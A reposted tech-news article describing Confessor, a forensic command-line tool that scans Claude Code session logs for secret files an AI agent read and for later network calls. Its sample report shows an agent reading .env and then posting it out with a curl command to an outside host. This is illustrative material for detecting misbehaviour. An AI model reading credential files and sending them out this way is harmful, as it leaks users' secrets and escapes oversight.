DEV Community

gentic news
gentic news

Posted on • Originally published at gentic.news

Confessor: The Forensic Tool That Shows You Exactly What Claude Code

Confessor replays Claude Code's JSONL session logs to show every file read, command, and network call — flagging sensitive data followed by exfiltration. Run npx confessor for a full HTML report.

Key Takeaways

  • Confessor replays Claude Code's JSONL session logs to show every file read, command, and network call — flagging sensitive data followed by exfiltration.
  • Run npx confessor for a full HTML report.

What Confessor Does

Confessor is a post-hoc forensic tool that answers a question you should be asking: What did Claude Code actually do on my machine?

Claude Code can read any file your user account can — .env, ~/.ssh keys, browser-saved passwords, tax PDFs. It can run shell commands and reach the network. Most of the time it does exactly what you asked. But you don't know that. You know it finished the task.

Confessor reconstructs the agent's entire history from session logs already sitting on your disk — every file opened, every command run, every secret that passed through its context, and everywhere it could have sent data. It flags the specific chain you care about: a sensitive file read, followed by a network call in the same session. Data in, a way out, right after.

How It Works

Claude Code writes every session to ~/.claude/projects/**/*.jsonl — one JSON event per line, including each tool call and its result. Confessor replays them in order, scanning file contents for secrets (API keys, SSH keys, credentials) and cross-referencing with network calls.

From the sample report (generated from planted fake data):

  • The agent read .env — three live keys inside — and fifteen seconds later ran curl -X POST … -d @.env to a host that isn't yours.
  • This is not proof anything was stolen. It's a lead, and it's exactly the question you can't answer today: did my stuff leave?

What Makes It Different

Existing tools in this space are compliance loggers — you wrap the agent, they stream events to a dashboard, you read audit trails. Confessor is the opposite: nothing to install alongside the agent, nothing running, no daemon. The logs are already on your disk. You run one command, after the fact, and get the forensic picture — including the read-then-exfiltrate chains, which the loggers don't connect for you. And it makes zero network calls itself.

Sensitive files the agent opened

Try It Now

You need Node ≥ 18.17. Then:

npx confessor
Enter fullscreen mode Exit fullscreen mode

With no arguments it finds your local Claude Code logs (~/.claude/projects), reconstructs what the agent did, scans the content, writes confessor-report.html, and opens it.

To include your chat services (ChatGPT, Claude, Gemini), download an export and point at it:

npx confessor --chats ./chat-export
Enter fullscreen mode Exit fullscreen mode

Flags:

  • --json — machine-readable output
  • --out <file> — specify output file
  • --no-open — don't auto-open the report
  • --quiet — minimal console output
  • --fail-on critical|high|medium — exits non-zero; drop in CI to fail a build that leaked a secret

When To Run It

  • After every Claude Code session where you worked with sensitive files (.env, SSH keys, API configs)
  • Before committing — run it as a pre-commit hook to catch secrets that might have been logged
  • In CI — use --fail-on critical to block PRs that leaked secrets into agent logs
  • Weekly audits — run against all recent sessions to spot anomalous patterns

An exposure path: the agent read .env, then curled it out

The Bottom Line

Confessor turns Claude Code's existing session logs into a forensic report that shows you exactly what the agent accessed. It's the closest thing to an audit trail for an AI coding agent that doesn't require running alongside the agent itself. If you're using Claude Code with any sensitive data, run this tool. The logs are already there.


Source: github.com


Originally published on gentic.news

Top comments (0)